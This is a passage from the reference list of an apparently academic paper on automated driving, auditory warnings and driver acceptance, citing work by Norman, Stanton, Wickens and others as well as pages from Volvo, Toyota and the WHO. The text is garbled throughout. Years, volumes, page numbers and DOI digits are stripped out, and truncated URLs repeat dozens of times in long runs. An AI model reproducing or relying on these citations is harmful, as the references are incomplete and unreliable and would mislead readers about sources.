noises—part i: spectra, levels, and microphones. aviation, space, and environmental medicine : – . nixon cw, anderson tr, morris lj, mccavitt a, mckinley rl, yeager dg, mcdaniel mp. b. female voice communications in high level aircraft cockpit noises—part ii: vocoder and automatic speech recognition systems. aviation, space, and environmental medicine : – . noyes jm, hellier e, edworthy j. . speech warnings: a review. theoretical issues in ergonomics science : – doi . / . norman da. . the ‘problem’ with automation: inappropriate feedback and interaction, not ‘over-automation’. philosophical transactions of the royal society of london. b, biological sciences : – doi . /rstb. . . payre w, cestac j, delhomme p. . intention to use a fully automated car: attitudes and a priori acceptability. transportation research part f: traffic psychology and behaviour : – doi . /j.trf. . . . rozier jm. . hear & there: an augmented reality system of linked audio. msc thesis, mit, cambridge, ma. rudin-brown cm, parker ha. . behavioural adaptation to adaptive cruise control (acc): implications for preventive strategies. transportation research part f: traffic psychology and behaviour : – doi . /j.trf. . . . scallen sf, hancock pa, duley ja. . pilot performance and preference for short cycles of automation in adaptive function allocation. applied ergonomics : – doi . / - ( ) - . sommer k. . mobility study . available at https://www.conti-online.com/www/pressportal com en/themes/initiatives/channel mobility study en/ov mobility study en/ (accessed july ). srinivasa n. . vision-based vehicle detection and tracking method for forward collision warning in automobiles. in: ieee intelligent vehicles symposium, . – . stanton na, young ms, walker gh, turner h, randle s. . automating the driver’s control tasks. international journal of cognitive ergonomics : – doi . /s ijce . stanton na, edworthy j. . human factors in auditory warnings. aldershot, gb: ashgate. stanton na, young ms, mccaulder b. . drive-by-wire: the case of driver workload and reclaiming control with adaptive cruise control. safety science : – doi . /s - ( ) - . strand n, nilsson j, karlsson icm, nilsson l. . semi-automated versus highly automated driving in critical situations caused by automation failures. transportation research part f: traffic psychology and behaviour : – doi . /j.trf. . . . sturgis p, roberts sc, smith p. . middle alternatives revisited: how the neither/nor response acts as a way of saying i don’t know? sociological methods & research : – doi . / . bazilinskyy and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf https://smartech.gatech.edu/bitstream/handle/ / / - .pdf http://dx.doi.org/ . / http://dx.doi.org/ . /rstb. . http://dx.doi.org/ . /j.trf. . . http://dx.doi.org/ . /j.trf. . . http://dx.doi.org/ . / - ( ) - https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ https://www.conti-online.com/www/pressportal_com_en/themes/initiatives/channel_mobility_study_en/ov_mobility_study _en/ http://dx.doi.org/ . /s ijce _ http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.trf. . . http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. tacken m, marcellini f, mollenkopf h, ruoppila i, széman z. . use and acceptance of new technology by older people. findings of the international mobilate survey: ‘enhancing mobility in later life’. gerontechnology : – doi . /gt. . . . . . takayama l, nass c. . driver safety and information from afar: an experimental driving simulator study of wireless vs. in-car information services. international journal of human computer studies : – doi . /j.ijhcs. . . . toyota. . parking. available at http://www.toyota-global.com/innovation/safety technology/ safety technology/parking/ (accessed november ). uk visas & immigration. . tier of the points based system—policy guidance. available at https://www.gov.uk/government/uploads/system/uploads/attachment data/file/ /t guidance - .pdf (accessed february ). underwood s. . automated vehicles forecast: vehicle symposium opinion survey. in: paper presented at the automated vehicles symposium , san francisco, ca. available at https://drive. google.com/file/d/ b ggx-cykv-wrevmtehhquxjowm/edit (accessed july ). varaiya p. . smart cars on smart roads. problems of control. ieee transactions on automatic control : – doi . / . . volkswagen. . park assist. available at http://www.volkswagen.co.uk/technology/ parking-and-manoeuvring/park-assist (accessed november ). volvo. a. volvo car group reveals world-class safety and support features that will be introduced in the all-new xc . available at https://www.media.volvocars.com/global/en-gb/ media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be- introduced-in-the-all-new-xc -in- (accessed november ). volvo. b. one million cars with pioneering auto brake technology sold: volvo car group reaches landmark safety milestone. available at https://www.media.volvocars.com/uk/en-gb/ media/pressreleases/ (accessed july ). weber m. . where to? a history of autonomous vehicles. available at http://www. computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ (accessed december ). wetmore j. . driving the dream. the history and motivations behind years of automated highway systems in america. automotive history review : – . wickens cd, hollands jg. . engineering psychology and human performance. new york: harpercollins publishers. world health organization. . global status report on road safety . world health organization. available at http://www.who.int/iris/bitstream/ / / / eng.pdf?ua= (accessed july ). yoshida j. . fully autonomous car? don’t buy shotgun yet. available at http://www.eetimes. com/author.asp?section id= &doc id= (accessed december ). bazilinskyy and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /gt. . . . . http://dx.doi.org/ . /j.ijhcs. . . http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ http://www.toyota-global.com/innovation/safety_technology/safety_technology/parking/ https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/ /t _guidance_ - .pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/ /t _guidance_ - .pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/ /t _guidance_ - .pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/ /t _guidance_ - .pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/ /t _guidance_ - .pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/ /t _guidance_ - .pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/ /t _guidance_ - .pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/ /t _guidance_ - .pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/ /t _guidance_ - .pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/ /t _guidance_ - .pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/ /t _guidance_ - .pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/ /t _guidance_ - .pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/ /t _guidance_ - .pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/ /t _guidance_ - .pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/ /t _guidance_ - .pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/ /t _guidance_ - .pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/ /t _guidance_ - .pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/ /t _guidance_ - .pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/ /t _guidance_ - .pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/ /t _guidance_ - .pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/ /t _guidance_ - .pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/ /t _guidance_ - .pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/ /t _guidance_ - .pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/ /t _guidance_ - .pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/ /t _guidance_ - .pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/ /t _guidance_ - .pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/ /t _guidance_ - .pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/ /t _guidance_ - .pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/ /t _guidance_ - .pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/ /t _guidance_ - .pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/ /t _guidance_ - .pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/ /t _guidance_ - .pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/ /t _guidance_ - .pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/ /t _guidance_ - .pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/ /t _guidance_ - .pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/ /t _guidance_ - .pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/ /t _guidance_ - .pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/ /t _guidance_ - .pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/ /t _guidance_ - .pdf https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/ /t _guidance_ - .pdf 